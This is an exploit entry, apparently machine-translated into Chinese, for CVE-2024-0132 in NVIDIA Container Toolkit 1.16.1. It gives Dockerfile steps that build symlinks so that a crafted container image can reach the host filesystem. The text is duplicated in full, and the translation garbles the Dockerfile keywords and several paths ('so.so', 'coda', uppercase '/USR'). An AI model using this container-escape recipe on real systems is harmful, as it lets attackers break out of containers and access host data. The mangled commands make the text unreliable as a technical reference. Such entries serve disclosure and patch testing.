#利用NVIDIA容器工具包的容器突破的容器突破
#日期: 17/02/2025
#利用作者: r0binak
#software链接homepage3360 https://github.com/nvidia/nvidia-container-toolkit
#版本: 1.16.1
#测试在: NVIDIA容器Triplit 1.16.1
#CVE: CVE-2024-0132
Description: NVIDIA容器工具包1.16.1或更早的
使用时检查时间(TOCTOU)漏洞时
默认配置在其中精心设计的容器图像可能
访问主机文件系统。这不会影响用例
使用CDI的地方。成功利用这种脆弱性可能会导致
执行代码,拒绝服务,特权升级,
信息披露和数据篡改。
POC LINK: https://github.com/R0BINAK/CVE-2024-0132
复制步骤:
基于此类Dockerfile:构建和运行Docker图像
来自Ubuntu
运行mkdir -p/usr/local/cuda/compat/
运行mkdir -p/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
运行回声测试
/USR/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
运行mkdir -p/pwn/libdxcore.so.1337/
运行ln -s ././././././././././././././
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
运行ln -s/pwn/libdxcore.so.so.1337/usr/local/cuda/coda/compat/libxxx.so.so.1
运行ln -s/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
/USR/local/cuda/compat/libxxx.so.2
主机文件系统将位于
/USR/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/
问候,
Sergey`r0binak`kanibor
#日期: 17/02/2025
#利用作者: r0binak
#software链接homepage3360 https://github.com/nvidia/nvidia-container-toolkit
#版本: 1.16.1
#测试在: NVIDIA容器Triplit 1.16.1
#CVE: CVE-2024-0132
Description: NVIDIA容器工具包1.16.1或更早的
使用时检查时间(TOCTOU)漏洞时
默认配置在其中精心设计的容器图像可能
访问主机文件系统。这不会影响用例
使用CDI的地方。成功利用这种脆弱性可能会导致
执行代码,拒绝服务,特权升级,
信息披露和数据篡改。
POC LINK: https://github.com/R0BINAK/CVE-2024-0132
复制步骤:
基于此类Dockerfile:构建和运行Docker图像
来自Ubuntu
运行mkdir -p/usr/local/cuda/compat/
运行mkdir -p/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
运行回声测试
/USR/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
运行mkdir -p/pwn/libdxcore.so.1337/
运行ln -s ././././././././././././././
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
运行ln -s/pwn/libdxcore.so.so.1337/usr/local/cuda/coda/compat/libxxx.so.so.1
运行ln -s/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
/USR/local/cuda/compat/libxxx.so.2
主机文件系统将位于
/USR/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/
问候,
Sergey`r0binak`kanibor